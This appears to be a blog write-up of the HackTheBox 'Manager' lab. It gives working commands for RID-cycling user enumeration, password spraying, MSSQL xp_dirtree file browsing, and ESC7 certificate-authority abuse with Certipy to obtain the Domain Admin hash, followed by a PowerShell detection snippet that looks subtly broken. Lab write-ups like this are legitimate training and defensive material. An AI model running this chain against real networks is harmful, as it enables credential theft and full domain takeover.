From MSSQL to Domain Admin: Hacking HTB’s Manager Machine – A Deep Dive into AD Exploitation + Video

Listen to this Post

Featured Image

Introduction:

In the ever-evolving landscape of cybersecurity, Active Directory (AD) remains the primary target for attackers seeking to compromise enterprise networks. The recent “Manager” machine walkthrough on HackTheBox showcases a classic yet devastating attack chain, transitioning from an unauthenticated network position to full Domain Admin control. This article dissects the methodology behind the compromise, providing a technical blueprint for understanding how enumeration, password spraying, and certificate service abuse (ESC7) are combined to root a domain. For blue teams, this serves as a critical case study in hardening AD CS and monitoring for anomalous authentication patterns.

Learning Objectives:

  • Understand how to perform RID cycling to enumerate domain users without credentials.
  • Execute a password spraying attack using gathered usernames.
  • Leverage MSSQL server access for file system enumeration and data retrieval.
  • Analyze and exploit Active Directory Certificate Services misconfigurations (ESC7).

You Should Know:

1. Initial Foothold: RID Cycling and Password Spraying

The first step in owning an Active Directory environment is often user enumeration. Since a null session is rarely available in modern Windows networks, attackers turn to techniques like RID cycling. This method uses a valid SID (Domain Identifier) to brute force Relative Identifiers (RIDs) to map out usernames. Using tools like `crackmapexec` or enum4linux-ng, we can automate this process.

Step‑by‑step guide:

 Using enum4linux-ng for RID cycling against the target DC
enum4linux-ng -A -R 500-550 <Target_IP>

This command attempts to enumerate users by cycling through RIDs. Once a list of valid usernames is obtained (e.g., rachel, mssql_svc, operator), the attacker proceeds to a password spraying attack. This involves trying a single weak password (like `Password123` or the season/year) against all discovered accounts to avoid lockouts.

 Using crackmapexec to spray a password against the user list
crackmapexec smb <Target_IP> -u users.txt -p 'Password123' --continue-on-success

If successful, this often yields a low-privilege shell or access to services like MSSQL, as seen in the HTB Manager machine.

2. Leveraging MSSQL for Webroot Access

With credentials for an MSSQL service account, the attacker connects to the database server. SQL Server provides powerful capabilities, including the `xp_cmdshell` extended stored procedure, which allows command execution on the host. However, in many engagements, `xp_cmdshell` is disabled. Attackers pivot to using `xp_dirtree` or `OPENROWSET` to interact with the file system.

Step‑by‑step guide (using Impacket’s mssqlclient.py):

 Connect to the MSSQL instance
impacket-mssqlclient 'domain/username:Password123@<Target_IP>'

Enumerate directories to find sensitive files (e.g., website backups)
SQL> EXEC master..xp_dirtree 'C:\inetpub\wwwroot\', 1, 1;
SQL> EXEC master..xp_dirtree 'C:\inetpub\wwwroot\backup\', 1, 1;

In the walkthrough, this revealed a website backup file containing credentials. Attackers can then use `smbclient` or mount the share to download the backup and extract plaintext passwords or hashes.

3. Certificate Services Abuse: The ESC7 Attack Path

With new credentials (likely for a standard domain user), the attacker scans for misconfigured Active Directory Certificate Services. ESC7 occurs when a user has the “Manage CA” or “Manage Certificates” access control, allowing them to issue certificates illicitly. This can lead to Domain Admin privileges by requesting a certificate template that permits authentication as any user.

Step‑by‑step guide (using Certify.exe or Certipy):

 On a Windows attack host, use Certify to find vulnerable templates
Certify.exe find /vulnerable

If ESC7 is confirmed (Manage CA + Enabled templates), use Certipy to exploit
 Add a new officer (required for managing the CA)
certipy ca -ca 'CA-NAME' -add-officer -username '[email protected]' -password 'Pass' -dc-ip <DC_IP>

Enable the "SubCA" template or a vulnerable one
certipy ca -ca 'CA-NAME' -enable-template 'SubCA' -username '[email protected]' -password 'Pass' -dc-ip <DC_IP>

Request a certificate for the Administrator account
certipy req -username '[email protected]' -password 'Pass' -ca 'CA-NAME' -target <CA_IP> -template 'SubCA' -upn '[email protected]'

Authenticate with the certificate to get a TGT and NTLM hash
certipy auth -pfx administrator.pfx -dc-ip <DC_IP>

This final step provides the attacker with the Domain Admin hash, completing the chain from an unprivileged user to full domain compromise.

4. Windows Command Line Analysis for Blue Teams

Defenders must look for indicators of this attack chain. On the Domain Controller, monitor Event ID 4768 (TGT requested) and 4886 (Certificate Services approved a certificate request). Unusual Service Principal Name (SPN) requests or certificate enrollments by non-admin users are red flags.

Detection script snippet (PowerShell):

 Check for recent certificate enrollments by low-privilege users
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4886} | Where-Object {$_.Properties[bash].Value -like 'SubCA'} | Select-Object TimeCreated, Message

5. Linux Utility Equivalents for Penetration Testing

If you are operating from a Linux machine, the entire chain can be executed with open-source tools:
– User Enumeration: `enum4linux-ng` or rpcclient $> enumdomusers.
– Password Spraying: `crackmapexec` or `kerbrute` passwordspray.
– MSSQL Interaction: `impacket-mssqlclient` or sqsh.
– ESC7 Exploitation: `certipy-ad` (as shown above).

What Undercode Say:

  • Key Takeaway 1: The HTB Manager machine illustrates that penetration testing is not about using a single exploit, but chaining logical weaknesses—starting with enumeration, moving to service misconfigurations, and culminating in privilege escalation via AD CS.
  • Key Takeaway 2: Organizations often overlook the security of their Certificate Authorities. ESC7 is a stark reminder that administrative roles within AD CS must be strictly limited; any user with “Manage CA” rights can effectively become a Domain Admin.
  • Analysis: This attack path highlights the “assume breach” mentality. By the time the attacker reached the MSSQL service, they had already won half the battle. Defenders should implement tiering, ensuring that service accounts (like MSSQL) are not domain users with the ability to authenticate to the CA. Furthermore, enabling extended audit logging on the CA and monitoring for unusual certificate requests (Event ID 4886/4887) is non-negotiable. The ease with which `certipy` automates ESC7 underscores the need for regular AD CS security assessments.

Prediction:

As ransomware groups continue to professionalize, we will see a significant uptick in the automation of AD CS exploitation. The “certificate of death” will become as common as SMBExec in post-exploitation toolkits. Consequently, Microsoft will likely introduce further hardening defaults in future Windows Server releases, potentially restricting low-privileged users from requesting certificates based on sensitive templates by default, forcing attackers to develop even more sophisticated methods of coercion or abuse.

▶️ Related Video (76% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Lidor Roccah – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky